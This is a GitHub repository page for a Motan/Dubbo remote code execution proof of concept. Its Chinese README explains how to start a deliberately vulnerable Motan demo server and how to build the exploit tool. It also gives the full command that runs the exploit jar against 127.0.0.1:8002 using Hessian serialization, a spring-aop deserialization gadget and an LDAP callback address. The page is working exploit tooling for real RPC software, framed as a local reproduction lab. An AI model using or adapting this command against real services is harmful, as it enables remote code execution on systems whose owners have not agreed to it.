Skip to content

zhzhdoai/Motan-rce

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits

dubbo-spring-boot-project-2.7.5

dubbo-spring-boot-project-2.7.5

 
 

motan-demo

motan-demo

 
 

rpc-rce

rpc-rce

 
 

README.md

README.md

 
 

poc.png

poc.png

 
 

Repository files navigation

Motan/dubbo-rce

前言

将Motan远程代码执行poc封装进threedr3am/learnjavabug项目中

快速利用

  1. motan-demo/motan-demo-server/src/main/java/com/weibo/motan/demo/server/DemoRpcServer.java 启动Motan服务(漏洞靶场)

  2. 编译rpc-rce:mvn clean package (jdk8+mvn3.2.5)

java -jar dubbo-exp-1.0-SNAPSHOT-jar-with-dependencies.jar --target 127.0.0.1:8002 --protocol motan --serialization hessian  --gadget spring-aop --arg ldap://127.0.0.1:9988

漏洞复现

  1. motan-demo/motan-demo-server/src/main/java/com/weibo/motan/demo/server/DemoRpcServer.java 启动Motan服务

  2. motan-demo/motan-demo-client/src/main/java/com/weibo/motan/demo/client/AnnotationRpcClientDemo.java 运行攻击服务

参考

rpc-rce框架拉取threedr3am/learnjavabug:https://github.com/threedr3am/learnjavabug.git

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

5 stars

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages